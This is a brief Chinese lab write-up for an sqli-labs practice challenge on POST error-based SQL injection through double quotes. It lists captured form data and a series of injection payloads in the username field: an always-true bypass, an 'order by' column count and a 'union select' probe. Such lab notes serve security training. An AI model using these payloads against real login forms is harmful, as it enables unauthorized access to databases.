phpstudy-sqlilabs-less-1

题目：POST - Error Based - Double quotes- String - with twist

基于错误的双引号post型字符变形的注入

 

先抓下包，拿到格式

uname=1#&passwd=1&submit=Submit

 

根据题目

注入点可能有 " )

 

尝试

uname=1" or 1=1 #&passwd=1&submit=Submit

出现报错

 

尝试

uname=1") or 1=1 #&passwd=1&submit=Submit

成功

 

查字符段

uname=1") or 1=1 order by 3 #&passwd=1&submit=Submit

 

查可回显字符段

uname=1") and 1=1 union select 1,2,3 #&passwd=1&submit=Submit

 

略